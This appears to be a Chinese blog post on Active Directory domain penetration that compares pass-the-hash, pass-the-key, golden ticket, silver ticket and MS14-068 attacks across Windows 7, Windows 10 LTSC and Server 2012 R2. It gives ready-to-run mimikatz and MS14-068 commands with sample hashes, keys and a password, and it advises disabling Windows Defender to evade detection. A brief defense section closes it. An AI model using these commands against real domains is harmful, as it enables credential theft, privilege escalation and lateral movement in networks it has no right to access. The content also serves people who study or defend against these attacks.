当前位置: 首页 > news >正文

域渗透(web安全)

根据提供的系统版本(Windows 7 SP1、Windows 10 LTSC 2019、Windows Server 2012 R2)和攻击类型(PTH/PTK/PTT/黄金票据/白银票据),以下是适配性分析及操作建议:


一、PTH(Pass the Hash)横向攻击适配性

1. Windows 7 SP1
  • 支持性:完全支持(默认未安装KB2871997补丁)

  • 攻击条件

    • 未打补丁时,所有用户均可通过LM/NTLM哈希传递

    • 若已安装KB2871997补丁,仅支持Administrator用户传递

  • 实验命令

    bash

    复制

    mimikatz "sekurlsa::pth /user:administrator /domain:mamba.com /ntlm:168665b84b96d6973f867364f53b0180"
  • 防御绕过:需关闭Windows Defender实时监控(通过注册表或组策略)13

2. Windows 10 LTSC 2019
  • 支持性:受限(默认集成KB2871997补丁)

  • 攻击条件:仅支持Administrator用户的NTLM哈希传递

  • 限制:若启用Credential Guard或LSA保护,需额外绕过措施7

3. Windows Server 2012 R2
  • 支持性:受限(默认安装KB2871997补丁)

  • 攻击条件:仅支持Administrator用户,且需目标开放SMB服务(445端口)

  • 推荐场景:优先使用PTK(AES256)或PTT攻击26


二、PTK(Pass the Key)横向攻击适配性

1. Windows 7 SP1
  • 支持性:需手动安装KB2871997补丁后可用

  • 攻击条件:需获取AES256密钥(通过sekurlsa::ekeys

  • 实验命令

    bash

    复制

    mimikatz "sekurlsa::pth /user:mamba /domain:mamba.com /aes256:a7ddbb2c4b7216746b8c523cf7995d2ed4c29f2ee4b795175b5ffce97ded3387"
2. Windows 10 LTSC 2019
  • 支持性:完全支持(默认启用AES加密)

  • 优势:绕过NTLM限制,支持所有用户传递9

3. Windows Server 2012 R2
  • 支持性:完全支持(补丁默认生效)

  • 适用场景:针对禁用NTLM的域环境,需结合服务识别(如LDAP/CIFS)6


三、PTT(Pass the Ticket)横向攻击适配性

1. 黄金票据(Golden Ticket)
  • 适用系统:所有系统(依赖域控权限)

  • 攻击条件

    • 获取krbtgt用户的NTLM Hash(lsadump::dcsync

    • 域名、域SID信息

  • 实验命令

    bash

    复制

    mimikatz "kerberos::golden /admin:administrator /domain:mamba.com /sid:S-1-5-21-XXXX /krbtgt:be0e527500207aa091f504474347f48b /ticket:golden.kirbi"
    kerberos::ptt golden.kirbi
  • 适配性:适用于所有系统,但需域控(如Server 2012 R2)未启用AES强制加密37

2. 白银票据(Silver Ticket)
  • 适用系统:所有系统(需目标服务支持)

  • 攻击条件

    • 服务账户的NTLM Hash(如CIFS/SQL Server)

    • 域名、域SID、服务SPN

  • 实验命令

    bash

    复制

    mimikatz "kerberos::golden /user:mamba /domain:mamba.com /sid:S-1-5-21-XXXX /target:dc.mamba.com /service:cifs /rc4:08972e15b1763a8537f276b159840c17 /ticket:silver.kirbi"
  • 适配性:尤其适合Windows Server 2012 R2(常见域控服务如CIFS/LDAP)8

3. MS14-068漏洞利用
  • 适用系统:仅未打补丁的Windows Server 2012 R2及更早版本

  • 限制:需普通域用户权限,且目标域控未安装KB3011780补丁

  • 实验步骤

    bash

    复制

    MS14-068.exe -u mamba3@mamba.com -s S-1-5-21-XXXX -d 192.168.128.128 -p Zrs123456..
    kerberos::ptc TGT_administrator@mamba.com.ccache
  • 适配性:Windows 7/Server 2012 R2可能适用,Windows 10已修复17


四、靶机适配性总结

攻击类型Windows 7 SP1Windows 10 LTSC 2019Windows Server 2012 R2
PTH(NTLM)✅(未打补丁)⚠️(仅Administrator)⚠️(仅Administrator)
PTK(AES256)⚠️(需补丁)
黄金票据✅(最佳适配域控)
白银票据✅(CIFS服务)✅(需服务支持)✅(最佳适配CIFS/LDAP)
MS14-068漏洞❌(已修复)⚠️(需未打补丁)

五、防御建议

  1. 补丁管理:确保所有系统安装KB2871997(PTH限制)、KB3011780(MS14-068修复)27

  2. 加密策略:强制使用AES256替代RC4,禁用NTLM协议3

  3. 日志监控:审计Kerberos票据事件(事件ID 4769/4771),检测异常票据生成8

  4. 权限控制:限制本地管理员账户同名问题,启用LSA保护9

如需进一步验证攻击路径,可使用systeminfo查看补丁状态,或通过BloodHound分析域内信任关系。

相关文章:

  • 归并排序与快速排序的简单实现(C语言)
  • 前端自动创建react项目脚手架
  • 中国太平保险网申校招测评笔试真题分析、历年真题题库、北森答案解析
  • golang 日志log与logrus
  • Android开发中的数据结构与算法:树与图
  • 音视频 YUV格式详解
  • Web开发-JS应用微信小程序源码架构编译预览逆向调试嵌套资产代码审计
  • 孤码长征:破译PCL自定义点云注册机制源码迷局——踩坑实录与架构解构
  • grafana 配置页面告警
  • 【LLM】Elasticsearch作为向量库入门指南
  • IDEA 终端 vs CMD:为什么 java -version 显示的 JDK 版本不一致?
  • 电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞
  • golang 的strconv包常用方法
  • J2EE框架技术第八章 SpringMVC框架技术
  • HarmonyOS 介绍
  • Ubuntu在VMware中无法全屏
  • MIPS-32架构(寄存器堆,指令系统,运算器)
  • 网络空间安全(45)PHP入门学习
  • 电影交流|基于Java+vue的电影交流平台小程序系统(源码+数据库+文档)
  • 封装了一个优雅的iOS全屏侧滑返回工具
  • 大庆建设公司网站/公司产品推广文案
  • 做装修的网站有哪些内容/nba常规赛
  • 南宁信息建设网站/关键词排名怎么做上首页
  • 如皋网页设计/开封搜索引擎优化
  • 淘客网站建设要求/上海百度提升优化
  • 哪家做网站/推广引流哪个软件最好